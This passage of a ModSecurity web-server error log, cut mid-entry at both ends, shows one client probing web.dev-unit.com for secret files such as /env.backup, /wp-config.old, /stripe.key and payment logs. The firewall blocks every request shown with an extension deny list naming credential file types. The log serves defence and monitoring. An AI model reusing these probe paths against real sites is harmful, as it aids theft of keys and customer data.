.idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config.inc"] [unique_id "ab3SnOWNdVzdR4d4e6ZHHQAAAQ4"] [Sat Mar 21 01:05:02.845486 2026] [:error] [pid 14300:tid 14341] [client 185.177.72.50:40390] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "ab3SnrR4r1NodKcenf7CzQAAAIE"] [Sat Mar 21 01:05:03.106602 2026] [:error] [pid 14300:tid 14348] [client 185.177.72.50:37462] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/error.log"] [unique_id "ab3Sn7R4r1NodKcenf7C0QAAAIU"] [Sat Mar 21 01:05:03.112688 2026] [:error] [pid 14298:tid 14323] [client 185.177.72.50:37492] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "ab3Sn7mQJQAcPl9RRRGMxgAAABQ"] [Sat Mar 21 01:05:03.181268 2026] [:error] [pid 14298:tid 14322] [client 185.177.72.50:37492] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "ab3Sn7mQJQAcPl9RRRGMxwAAABM"] [Sat Mar 21 01:05:03.223316 2026] [:error] [pid 14300:tid 14342] [client 185.177.72.50:37462] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "ab3Sn7R4r1NodKcenf7C0gAAAII"] [Sat Mar 21 01:05:23.898598 2026] [:error] [pid 17713:tid 17802] [client 185.177.72.50:38972] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/env.backup"] [unique_id "ab3Ss-WNdVzdR4d4e6ZICQAAAQw"] [Sat Mar 21 01:05:28.534909 2026] [:error] [pid 26363:tid 26397] [client 185.177.72.50:38914] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-config.old"] [unique_id "ab3SuN4YyF1e-QDujo-AGQAAAUA"] [Sat Mar 21 01:05:28.586192 2026] [:error] [pid 26363:tid 26419] [client 185.177.72.50:38914] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "ab3SuN4YyF1e-QDujo-AGwAAAVY"] [Sat Mar 21 01:05:30.522463 2026] [:error] [pid 17713:tid 17812] [client 185.177.72.50:38974] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.key"] [unique_id "ab3SuuWNdVzdR4d4e6ZIaAAAARY"] [Sat Mar 21 01:05:30.719387 2026] [:error] [pid 26363:tid 26409] [client 185.177.72.50:38910] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.log"] [unique_id "ab3Sut4YyF1e-QDujo-AUwAAAUw"] [Sat Mar 21 01:05:30.811431 2026] [:error] [pid 26363:tid 26418] [client 185.177.72.50:38910] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.conf"] [unique_id "ab3Sut4YyF1e-QDujo-AVQAAAVU"] [Sat Mar 21 01:05:30.889240 2026] [:error] [pid 26363:tid 26414] [client 185.177.72.50:38910] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.ini"] [unique_id "ab3Sut4YyF1e-QDujo-AVgAAAVE"] [Sat Mar 21 01:05:30.923374 2026] [:error] [pid 26363:tid 26399] [client 185.177.72.50:38910] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.bak"] [unique_id "ab3Sut4YyF1e-QDujo-AWAAAAUI"] [Sat Mar 21 01:05:31.032441 2026] [:error] [pid 26363:tid 26413] [client 185.177.72.50:38910] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.old"] [unique_id "ab3Su94YyF1e-QDujo-AXQAAAVA"] [Sat Mar 21 01:05:31.443813 2026] [:error] [pid 26363:tid 26405] [client 185.177.72.50:38702] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/stripe.backup"] [unique_id "ab3Su94YyF1e-QDujo-AaQAAAUg"] [Sat Mar 21 01:05:37.320180 2026] [:error] [pid 14299:tid 14355] [client 185.177.72.50:58156] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config.inc"] [unique_id "ab3SwYgHLbuvz2RS3ZvZzQAAAE8"] [Sat Mar 21 01:05:40.868062 2026] [:error] [pid 14299:tid 14368] [client 185.177.72.50:58156] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "ab3SxIgHLbuvz2RS3ZvZ3gAAAFU"] [Sat Mar 21 01:05:40.980369 2026] [:error] [pid 14299:tid 14353] [client 185.177.72.50:58156] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/error.log"] [unique_id "ab3SxIgHLbuvz2RS3ZvZ3wAAAE4"] [Sat Mar 21 01:05:40.993423 2026] [:error] [pid 17713:tid 17798] [client 185.177.72.50:38966] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "ab3SxOWNdVzdR4d4e6ZJTQAAAQg"] [Sat Mar 21 01:05:41.018146 2026] [:error] [pid 17713:tid 17806] [client 185.177.72.50:58226] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/payments.log"] [unique_id "ab3SxeWNdVzdR4d4e6ZJTgAAARA"] [Sat Mar 21 01:05:41.025529 2026] [:error] [pid 14299:tid 14355] [client 185.177.72.50:58324] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/stripe.log"] [unique_id "ab3SxYgHLbuvz2RS3ZvZ4AAAAE8"] [Sat Mar 21 01:06:04.927563 2026] [:error] [pid 14425:tid 14438] [client 185.177.72.50:19856] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.web.dev-unit.com"] [uri "/env.backup"] [unique_id "ab3S3EMqeKc_GzeuAXAUtgAAAMs"] [Sat Mar 21 01:06:06.083788 2026] [:error] [pid 25090:tid 25183] [client 185.177.72.50:21358] [client 185.177.72.50] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ 